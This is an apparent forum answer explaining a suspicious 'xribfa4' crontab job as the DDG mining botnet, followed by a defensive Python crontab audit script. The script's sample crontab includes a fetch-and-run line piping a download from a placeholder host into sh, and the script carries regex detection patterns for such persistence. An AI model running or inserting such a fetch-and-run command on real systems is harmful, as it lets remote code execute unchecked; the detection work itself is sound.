Suspicious crontab entry running 'xribfa4' every 15 minutes

It is a DDG mining botnet. How it works:

  1. exploiting an RCE vulnerability
  2. modifying the crontab
  3. downloading the appropriate mining program (written in Go)
  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers

SystemdMiner when a botnet borrows another botnet’s infrastructure

U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
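
Added example, not part of the answer above: a small Python audit that parses crontab lines and flags jobs matching two persistence patterns relevant to step 2 (a download piped to a shell, and a binary run from a world-writable directory). The heuristics, the sample crontab, the host `example.invalid` and the `/tmp` location of `xribfa4` are assumptions made for illustration.

```python
import re

# Heuristics below are illustrative assumptions, not a published DDG signature.
FETCH_PIPE = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")
TEMP_PATH = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S+")
ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_entry(line, has_user_field=False):
    """Return (schedule, command) for a job line, or None for anything else.
    has_user_field=True is for /etc/crontab and /etc/cron.d files."""
    line = line.strip()
    if not line or line.startswith("#") or ASSIGNMENT.match(line):
        return None
    nsched = 1 if line.startswith("@") else 5      # @reboot etc. use one field
    fields = nsched + (1 if has_user_field else 0)
    parts = line.split(None, fields)
    if len(parts) <= fields:                        # no command present
        return None
    return " ".join(parts[:nsched]), parts[-1]

def audit(lines, has_user_field=False):
    """Return [(line_number, schedule, [reasons])] for suspicious jobs."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        entry = parse_entry(raw, has_user_field)
        if entry is None:
            continue
        schedule, command = entry
        reasons = []
        if FETCH_PIPE.search(command):
            reasons.append("download piped to shell")
        if TEMP_PATH.search(command):
            reasons.append("runs from world-writable directory")
        if reasons:
            findings.append((lineno, schedule, reasons))
    return findings

# Constructed sample crontab; the host and the /tmp path are made up.
SAMPLE = """\
# m h dom mon dow command
MAILTO=root
17 3 * * * /usr/local/bin/backup.sh
*/15 * * * * curl -fsSL http://example.invalid/i.sh | sh
*/15 * * * * /tmp/xribfa4
@reboot /usr/bin/logger "system started"
""".splitlines()

if __name__ == "__main__":
    for lineno, schedule, reasons in audit(SAMPLE):
        print(f"line {lineno} [{schedule}]: {', '.join(reasons)}")
```

Run it over the output of `crontab -l` for each user, and over `/etc/crontab` and files in `/etc/cron.d` with `has_user_field=True`.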


Figure out which TCP and UDP ports are actually needed, and then block all of the other ports in your router's firewall. Possibly, those crontab entries will not reappear.

You can see which ports are open and public by using the Shields Up! feature at grc.com.